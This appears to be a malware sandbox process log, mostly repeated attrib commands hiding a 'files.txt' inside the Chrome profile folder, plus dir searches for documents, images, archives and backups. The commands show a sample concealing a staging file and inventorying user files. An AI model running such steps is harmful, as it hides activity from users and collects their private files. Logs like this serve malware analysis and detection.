C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.png4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.pptx4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.doc4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.docx4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.zip4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.jpeg4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.bak4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.lnk4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
